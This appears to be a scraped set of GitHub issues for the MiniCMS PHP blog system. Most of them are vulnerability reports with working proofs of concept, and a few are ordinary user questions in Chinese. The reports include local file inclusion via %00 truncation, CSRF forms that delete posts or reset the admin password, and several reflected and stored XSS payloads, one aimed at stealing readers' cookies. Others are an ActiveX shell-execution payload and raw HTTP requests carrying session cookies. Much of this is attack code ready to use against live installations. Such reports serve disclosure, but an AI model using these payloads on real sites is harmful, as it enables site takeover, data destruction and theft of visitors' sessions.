PHP Version <5.3.4
Local File Inclusion vulnerability in page-edit.php

$data = unserialize(file_get_contents($file_path));
$page_old_state = $data['state'];
$index_file = '../mc-files/pages/index/'.$page_old_state.'.php'
require $index_file

write a page or article with content:

use burp to

Require:
PHP Version <5.3.4
magic_quotes_gpc=off
1.
require $index_file
$index_file = '../mc-files/posts/index/'.$post_old_state.'.php'
$post_old_state = $data['state']

2.
write a page or article with content

3.
can see url is

so filename is 2kbz44.bat
4.use burppsuite,we can find phpinfo in response

因为需要对旧图片的URL进行改正，我使用编辑器对.dat文件进行批量替换

打开文章页面提示报错

Notice: Trying to access array offset on value of type bool in C:\phpEnv\www\localhost\mc-files\mc-tags.php on line 458

好像是字数被改变了就会报错，我恢复就正常了！当然如果在后台文章编辑页面一个个修改图片地址，前台文章页面显示正常不会报错，但是这样很麻烦！

我百度了很久找不到原因，我想正常人应该不会碰到，我只是在迁移过程中出了点问题需要改进！

我会继续百度寻找我的答案！

Hi, I would like to report Local File Inclusion vulnerability in MiniCMS latest release.

Description:

Require:
PHP Version <5.3.4
Local File Inclusion vulnerability in post-edit.php and page-edit.php

 $post_state       = $_POST['state'];
 $post_old_state = $data['state'];
        $index_file = '../mc-files/posts/index/'.$post_old_state.'.php';
        require $index_file;

Steps To Reproduce:

write a page or article with content:

<script language="php">
phpinfo()
</script>

save this article,then use the page to execute php code.
For example,this article's path:
../data/x3hveo.dat
then
use burp to edit the state to ../data/x3hveo.dat%00

the phpinfo will be execute:

author by [email protected]

Software Link : https://github.com/bg5sbk/MiniCMS After the installation is complete, log in as administrator, open the page

In post.php, user can delete any local .dat files without filter

Create 1.dat in the parent directory

To delete 1.dat, the url is like http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=

Also you can delete any .dat file like local google chrome file

http://127.0.0.1:80/MiniCMS-master/mc-admin/page.php?delete=../../../../../../../../opt/google/chrome/icudtl&state=delete&date=&tag=

Here is CSRF POC test.html: Log in and click the link in test.html, modify the parameter of delete and users will delete the .dat file in the specified directory at last.

<a href="http://127.0.0.1:80/MiniCMS-master/mc-admin/post.php?delete=../1&state=delete&date=&tag=">click</a>

In addition to page_edit.php, there is also an LFI loophole in post_edit.php
page_edit.php
line 109:
$index_file = '../mc-files/pages/index/'.$page_state.'.php';
require $index_file;

line 99:
$data = array(
'file' => $page_file,
'path' => $page_path,
'state' => $page_state,
'title' => $page_title,
'date' => $page_date,
'time' => $page_time,
'can_comment' => $page_can_comment,
);

$index_file = '../mc-files/pages/index/'.$page_state.'.php';

require $index_file;

$mc_pages[$page_path] = $data;

ksort($mc_pages);   

file_put_contents($index_file,
  "<?php\n\$mc_pages=".var_export($mc_pages, true)."\n?>"
);

$data['content'] = $page_content;

file_put_contents($file_path, serialize($data));#$file_path = '../mc-files/pages/data/'.$_GET['file'].'.dat';

$succeed = true;

In the page editor, serialize and encode the incoming title, content, etc., and store them in xxxxxx.dat
So we can insert php statements in the dat file, so that the file contains the structure rce
Note that this file contains the suffix .php
When the conditions are met:
php <5.3.4
magic_quotes_gpc=Off
At this time, we can use %00 truncation to bypass

Vulnerability description

A xss vulnerability was discovered in MiniCMS.
Vulnerability trigger point: MiniCMS-master/mc-admin/post.php?date=

poc:

/minicms/mc-admin/page.php?date=%22%3E%3C/a%3E%3Cimg%20src=%221%22%20onerror=alert(1)%3E%3Ca%3E

如题
标题 url .

尊敬的作者：请问这个cms能承载多少篇文章？如果文章写到9000篇的话，加载速度会不会比较慢，效率低了？
另外cms的安全性怎么样，黑客会找漏洞攻击吗？

post_edit and page_edit.php

line99
$index_file = '../mc-files/posts/index/'.$post_state.'.php';

line102
$index_file = '../mc-files/pages/index/'.$post_state.'.php';

post_state is controllable and there is no filtering limit

We can use ../ to loop through all files

是这样的，真的很喜欢这款程序，很简洁，但是有一些喜爱的功能它并不支持，我对MiniCMS进行了二次开发，并发布在了Github上，在这里通知您一声，如果因为某些原因侵犯了您的权益，您可以在Github上联系我，我会及时删除相关代码。

新的项目地址在：https://github.com/Tokinx/McBlog

它的演示地址是：http://hi.idevs.cn

再次感谢MiniCMS

于MiniCMS这么棒这么精简的系统，别无他求了
唯一奢求就是可以 “自适应”
因为现在用手机看东西的频率比用电脑高啊
考虑考虑^_^

One: use CSRF vulnerability to delete article
Vulnerability details:
When the administrator logs in, opening the webpage will automatically delete the specified article.
Vulnerability url: http://127.0.0.1/MiniCMS/mc-admin/post.php
Vulnerability POC:

不好意思，在您的github下没有找到install.php的文件，直接进入主页面之后显示
创建配置文件失败，创建文章索引目录失败，创建页面索引目录失败
在您的网站中下载了install.php后，显示
解压install.txt失败
是什么原因呢

environment:

• php.7.3.4
• win10

First,you need to Login the backstage here: /mc-admin/

Second,use payload: /mc-admin/post-edit.php?id=%3Cscript%3Ealert%285%29%3C/script%3E

you will see Pop-ups,then click here :

you will see Web Directory leak out like this:

1、Download source code audit，It was found that the date parameter in the post.php file was not filtered during output.

# line 245
function goto_page(e)
{
  var evt = e || window.event;
  var eventSrc = evt.target||evt.srcElement;

  if ((e.keyCode || e.which) == 13) {
    location.href = '?state=<?php echo $state; ?>&date=<?php echo $filter_date;?>&tag=<?php echo urlencode($filter_tag); ?>&page=' + eventSrc.value;
  }
}

2、payload and recurrence vulnerability

1111'</script><script>alert(1);</script>

Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Markdown_Parser has a deprecated constructor in /home/ftp/f/fgjqikdf/wwwroot/mc-files/markdown.php on line 223 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; MarkdownExtra_Parser has a deprecated constructor in /home/ftp/f/fgjqikdf/wwwroot/mc-files/markdown.php on line 1703

use CSRF vulnerability to delete multiple pages

it was found in mc-admin/page.php.This vulnerability is similar to CVE-2019-9603 but at a different place.

if admin create new page like ccc,aaa or more

Vulnerability details:
When the administrator logs in, opening the webpage will automatically delete the specified page

Vulnerability url: http://127.0.0.1/MiniCMS/mc-admin/page.php

Vulnerability POC:

delete one :<iframe src="127.0.0.1/MiniCMS-master/mc-admin/page.php?apply=delete&ids=ccc">

delete more :<iframe src="127.0.0.1/MiniCMS-master/mc-admin/page.php?apply=delete&ids=ccc,aaa">

just like this:

MiniCMS V1.10 has XSS in the mc-admin/post.php while state=delete, draft, publish via tag parameter.

Affected Version : MiniCMS V1.10
Affected URL: http://{host}/MiniCMS-1.10/mc-admin/post.php?state=&tag=&date=

1. GET /host/MiniCMS-1.10/mc-admin/post.php?state=publish&tag=prince%3Cscript%3Ealert%2812%29%3B%3C%2Fscript%3E&date=2018-08 HTTP/1.1
   Host:
   User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate
   Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; admin_auth=eyJpdiI6ImtNXC8xRHViQ1Z1Zks0cUJXclwva0hxZz09IiwidmFsdWUiOiJQclBudG5vTmh0YWVuKzdwNUpHTm1VSHJDdVNjVys4cmNybVV3cVFNb0tYdVY0QXdXVU0rVUhCT0wxTjN1V3lVWnNhZCt2UG8rZ0ZoRzVPQU1MSTNwNzFKUXFhaittS1Z6cThZemlja1lTdFIrdzJiRzFZdHd3eUJIaElTdG5xXC8iLCJtYWMiOiIxMTkxMDg5MWY4Y2Q5ODI5YTE0M2JmYTAxNjZmMzdiZDFlMWYxNTlmY2YyZmVlNGY5OWEyZjhmMjZlYjI4MWQzIn0%3D
   Connection: close
   Upgrade-Insecure-Requests: 1

2. GET /host/MiniCMS-1.10/mc-admin/post.php?state=delete&tag=prince%3Cscript%3Ealert%2812%29%3B%3C%2Fscript%3E&date=2018-08

3. GET /host/MiniCMS-1.10/mc-admin/post.php?state=publish&tag=prince%3Cscript%3Ealert%2812%29%3B%3C%2Fscript%3E&date=2018-08

MiniCMS V1.10 has XSS in the mc-admin/post-edit.php via tags parameter

Affected Version : MiniCMS V1.10
Affected URL: http://{host}/MiniCMS-1.10/mc-admin/post-edit.php

POC:

POST /princy/minicms/minicms_1.10_latest/MiniCMS-1.10/mc-admin/post-edit.php?id=aaaaaa HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://host/princy/minicms/minicms_1.10_latest/MiniCMS-1.10/mc-admin/post-edit.php?id=aaaaaa
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1531738241,1533619522; __atuvc=2%7C30%2C0%7C31%2C0%7C32%2C0%7C33%2C1%7C34; rcc_accepted=1; sidenav_treesearch=; sidenav_treegroupStatus=; admin_auth=eyJpdiI6ImtNXC8xRHViQ1Z1Zks0cUJXclwva0hxZz09IiwidmFsdWUiOiJQclBudG5vTmh0YWVuKzdwNUpHTm1VSHJDdVNjVys4cmNybVV3cVFNb0tYdVY0QXdXVU0rVUhCT0wxTjN1V3lVWnNhZCt2UG8rZ0ZoRzVPQU1MSTNwNzFKUXFhaittS1Z6cThZemlja1lTdFIrdzJiRzFZdHd3eUJIaElTdG5xXC8iLCJtYWMiOiIxMTkxMDg5MWY4Y2Q5ODI5YTE0M2JmYTAxNjZmMzdiZDFlMWYxNTlmY2YyZmVlNGY5OWEyZjhmMjZlYjI4MWQzIn0%3D;
Connection: close
Upgrade-Insecure-Requests: 1

IS_POST_BACK=&title=Prince&content=&tags=%22%3E%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&year=2018&month=08&day=30&hourse=07&minute=40&second=33&can_comment=1&state=draft&id=aaaaaa&save=%E4%BF%9D%E5%AD%98

This is a stored XSS vulnerability
first，we shoud land （http://127.0.0.1/test/MiniCMS-master/mc-admin/）
writing articles and published an article
payload ："/><script>confirm(document.cookie)</script>
i think you can see the following picture to konw more.

POST /test/MiniCMS-master/mc-admin/post-edit.php?id=qhywyf HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/MiniCMS-master/mc-admin/post-edit.php?id=qhywyf
Content-Type: application/x-www-form-urlencoded
Content-Length: 274
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6
Connection: keep-alive
Upgrade-Insecure-Requests: 1

IS_POST_BACK=&title="/><script>confirm(document.cookie)</script>&content="/><script>confirm(document.cookie)</script>&tags=&year=2018&month=04&day=22&hourse=11&minute=44&second=00&can_comment=1&state=publish&id=qhywyf&save=%E4%BF%9D%E5%AD%98

when we published the article and we can see it from homepage.

If people read our articles, we can easily get their cookie.
src=http://xxx.xxx.xxx.xxx/

刚安装了下，发现没有后台
输入 xxx.com/mc-admin/没反应
输入xxx.com/mc-admin/post.php没反应

PHP版本是5.6.30

On the homepage, you can generate a exp like below:
/?tag/"><a href=/?page=12
and you will get a alert like this

full link:
http://1234n.com/?tag/%22%3E%3Cimg%20src=1%20onerror=alert(123)%3E%3Ca%20href=/?page=12

First ， Click to enter the creation page

Then, enter XSS payload in the content bar and Remember to choose publish

Click to view

OK！

This is a reflective XSS vulnerability that will lead to phishing attacks.

poc:
GET /MiniCMS-master/MiniCMS-master/mc-admin/conf.php?[payload] HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://127.0.0.1/MiniCMS-master/MiniCMS-master/mc-admin/page.php
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; lang=3f81c1cb88c4e6355b4f5f02b32b4bdf8a9479da%7Een

payload=oz76w"><script>alert(1)</script>jqpj5=1

screenshot
1.

2.

This is a reflective XSS vulnerability
poc :

GET /MiniCMS-master/mc-admin/page.php?date=%22%3E%3C/a%3E%3Cimg%20src=%221%22%20onerror=alert(1)%3E%3Ca%3E HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: mc_token=d334628ee9a00a2ee62ad2c49aa66542; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1532591258; bdshare_firstime=1533113832628; iCMS_USER_AUTH=e01c476eT4bQdPtsWmzXl42txWbCIOesg%252BS%252F6gVg2cC%252FovhDVtBKX8rtXJtGbNJ9Bj7dBdE6VvqiX5EuvqCkEW66XTPjFxuseUJZi7z%252BORP2gjtoVYEXmr2Wbxa9uqJxEGmeDs1FPx1aYVD0FQm0tmQZuW9s8glK45fx%252BSPmdHLlbMcILzbqS3L8oAmMnE3s6OJUeecK%252FAtEfanGKW8dL6J0SSNE4%252FJol2h%252FS%252BXtPvEaxL%252B%252BgrR5ZNO9Bs%252F3tjBRrJfLcce95WLTlQl9b0NHU4AW0c9XGmbwMPmHeuiw9decJdP3RB2wyTUsyweMa6vXez5JH7F3i0Zm5UHj44Nt%252FxtgYLTZj20oKFQ9%252FKjXurvVFGwzISOxga%252FbtChvg86Zv4CcLksCPQh8zcp6MLyJJLBl1UWtJgraOdIZTASeqDRldBh6zihDwkfdh1mSjKlp0DQS8I086KPQnIpiy%252BWOlGPggpprumKddzGGOWCrl9ViOsTrU1xZLPaHklSpFFUypz4PxLXG4oSWvYixnUg9n0ycMC%252FDTA; iCMS_userid=d9b19480%252F1w5uy225Gj3TAlA3rip3pKZXcb9fI7JRZUq5ySw4Q; iCMS_nickname=588b0ade5DACxdo6BRGKvFFSLC7vY9tu8KTNREeXteba6BmHHfk; iCMS_article_category_tabs=list; iCMS_captcha=96448ad9d9Pvnsxi2Y87S%252BuBc%252FVRY1QgdS37nVPGY86nflTX
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

reason :
File: WWW/MiniCMS-master/mc-admin/page.php

result :

revise admin password

hi.
我克隆了你的源码，没发现install.php,访问http://mydomain.com/build.php,则显示
“必须指定版本号”，怎么解决问题？

A stored XSS was found in mc-admin/post-edit.php.This vulnerability is similar to CVE-2018-10296 but at a different place.
POC:
Firstly,enter the /MiniCMS/mc-admin/post-edit.php page and write the payload” <script>alert(document.domain)</script>” into the tags box:

Save it,then return to the main page to go to the archive page:

Then you get the window popped with the domain:

I found two information leakage vulnerabilities in MiniCMS, you need to login the backstage first.

The first one reveals the web root files on the web server:

Steps to reproduce:

1、Login in to the backstage http://192.168.232.181/MiniCMS-master/mc-admin/
2、Post an article
3、Checked the page and see

4、The url will direct to the following...

We can see all the files locate in web root the the server.

The second reveals the real path of the MiniCMS files

Steps to reproduce

1、Login in to the backstage http://192.168.232.181/MiniCMS-master/mc-admin/
2、Post an article
3、Try to re-edit this page, actually this page is save as iabl13.dat

we can see :

4、Using burp to intercept this request
the original id is iabl13, and we change to hello-iabl13

5、Actually hello-iabl13 is not really exists, error occurs

This vulnerability reveals the full path of MiniCMS

This is a reflective XSS vulnerability because "echo $_SERVER['REQUEST_URI'];" in 39 line

index.php

<body>
  <form action="<?php echo $_SERVER['REQUEST_URI']; ?>" method="post">
  <div id="login_title">MiniCMS</div>
  <div id="login_form">
    <div id="login_form_box">
      <div class="label">帐号</div>
      <div class="textbox"><input name="user" type="text" /></div>
      <div class="label">密码</div>
      <div class="textbox"><input name="pass" type="password" /></div>
      <div class="bottom"><input name="login" type="submit" value="登录" class="button" /></div>
    </div>
  </div>
  </form>
</body>

In Firefox and chrome, URL will be URLencoded.
In IE, if has Redirection，URL will not be URLencoded.
IE exp: exp.php

<?php
header("Location: http://example.org/mc-admin/index.php?123=\"><svg/onload=alert(document.domain)>");

RSS 相关代码为什么不使用 Content-Type: application/rss+xml，而是使用的 text？有什么特殊考虑吗？

Three stored XSSes were found, and all of them have not been found before. And the first one is similar to the third one, but the first one is in post-edit page while the other in page-edit page.

Stored XSS 1：

In /MiniCMS/mc-admin/post-edit.php
Payload：<script>alert(document.domain)</script>

POC:

1. Go to the article edit page, input payload into the content box:
   

2. Use burpsuite and edit the payload(the frontstage will encode the payload):
   

3. After that, tern to the article page:
   

4. Then you get the window popped with the domain:
   

Stored XSS 2：

In/MiniCMS/mc-admin/conf.php
Payload：<script>alert("2:"+document.domain)</script>

POC:

1. Enter config page
   

2. Upload the payload in comment
   

3. Then write an article and set the comment code into true and save
   

4. When someone is reading the article, awindowwillpopwiththedomain
   

Stored XSS 3：

Payload：<script>alert("3: "+document.domain)</script>
In /MiniCMS/mc-admin/page-edit.php

POC:

1. Go to the page-edit page and input the payload into the content box ,click save button :
   

2.Use burpsuite to edit the payload. Pay attention that the “+” needs to be url-encoded:

3.After that, go to the page we have saved:

4.Window will pop with the domain:

希望早点开发新版本，支持dropbox和生成静态页面功能！

In this page "MiniCMS-master\mc-admin\page-edit.php" have a file inclusion vulnerability.
1.The parameter “$page_state”get from POST，it is Controllable.

2.The parameter"index_file" is Controllable too.

3.Causes File Inclusion vulnerabilities

After the administrator logged in, open the following page
poc：

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
<title>test</title>
<body>
<form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
<input type="hidden" name="site_name" value="hack123" />  
<input type="hidden" name="site_desc" value="hacktest" />  
<input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />  
<input type="hidden" name="user_nick" value="hack" />  
<input type="hidden" name="user_name" value="admin" />  
<input type="hidden" name="user_pass" value="hackpass" />  
<input type="hidden" name="comment_code" value="" />  
<input type="hidden" name="save" value="保存设置" /> 
</form>
<script>
	document.forms[0].submit();
</script>
</body>
</head>
</html>

vulnerability location:date parameter
/MiniCMS-1.11/mc-admin/page.php?state=draft&date=2024-04

Payload:
</script><script>alert(123)</script>
Access the address with payload after login:
/MiniCMS-1.11/mc-admin/page.php?state=draft&date=2024-04</script><script>alert(123)</script>
Then we can find it triggering the xss vulnerability:

Monstra - version 3.0.4

Exploit uri -> http://localhost/path/admin/index.php?id=pages&action=edit_page&name=error404
Parameter -> page_meta_title

POC:

POST /localhost/path/admin/index.php?id=pages&action=edit_page&name=error404 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ocalhost/path/monstra/monstra-3.0.4/admin/index.php?id=pages&action=edit_page&name=error404
Content-Type: application/x-www-form-urlencoded
Content-Length: 475
Cookie: admin_username=admin; PHPSESSID=68m15vretbrdhhfa2ac19nqe17;
Connection: close
Upgrade-Insecure-Requests: 1

csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=error404&old_parent=&page_id=1&page_title=error404+&page_name=error404&page_meta_title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&page_keywords=&page_description=&pages=&templates=index&status=published&access=public&editor=%3Ch2%3E404+Page+Not+Found%3C%2Fh2%3E%3Cdiv%3EWe%27re+sorry+but+the+page+you+are+looking+for+doesn%27t+appear+to+exist%21%3C%2Fdiv%3E&page_tags=&edit_page=Save&page_date=2012-02-03+17%3A30%3A00

I found one information leakage vulnerabilities in MiniCMS, you need to login the backstage first.If your PHP version is 5.4, you will be successful.

It reveals the real path of the MiniCMS files

Repetition steps

1、Login in to the backstage http://127.0.0.1/MiniCMS1/mc-admin/
2、Post an article

This vulnerability reveals the full path of MiniCMS

This is a reflective XSS vulnerability

poc :

GET /MiniCMS1/mc-admin/post.php?date=2018-12%22%3E%3Cimg%20src=1%20onerror=alert(/dudu/)%3E HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; csrftoken=f3jMR3N7YdH7M19WOouMT8E6PkgsC4vybIXTrzleAVkrz47HPKwntea7bZOhf13f
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1

reason:

File: WWW/MiniCMS-master/mc-admin/post.php

result:

如题~

There is a storage XSS vulnerability at the location of the web site at the page setup site, which can be executed by constructing POC.
poc:

POST /MiniCMS-master/MiniCMS-master/mc-admin/conf.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/MiniCMS-master/MiniCMS-master/mc-admin/conf.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 449
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; lang=3f81c1cb88c4e6355b4f5f02b32b4bdf8a9479da%7Een
Connection: close
Upgrade-Insecure-Requests: 1

site_name=%E6%88%91%E7%9A%84%E7%BD%91%E7%AB%99&site_desc=%E5%8F%88%E4%B8%80%E4%B8%AAMiniCMS%E7%BD%91%E7%AB%99&site_link=http%3A%2F%2F127.0.0.1%2FMiniCMS-master%2FMiniCMSmaste[payload]&user_nick=%E7%A5%9E%E7%A7%98%E4%BA%BA&user_name=admin&user_pass=&comment_code=%26lt%3Bsvg%2Fonload%3Dalert%28%27xss%27%29%26gt%3B&save=%E4%BF%9D%E5%AD%98%E8%AE%BE%E7%BD%AE

payload = "><script>var%20objShell;objShell=new%20ActiveXObject("WScript.Shell").run("calc.exe");</script><"

Example：
1.Login to the background, locate the site, and find the website address.

2.Constructing exp at the site_link parameter

3.Access through IE, run active

4.Pop-up the CMD command

This is a reflective XSS vulnerability because "echo $_SERVER['REQUEST_URI'];" in post-edit.php 152 line

post-edit.php

In Firefox and chrome, URL will be URLencoded.
In IE, if has Redirection，URL will not be URLencoded.

After logging in, XSS is triggered using exp

Exp:

http://127.0.0.1/MiniCMS1/mc-admin/post-edit.php?520=\"><script>alert("dudu")</script>

Result: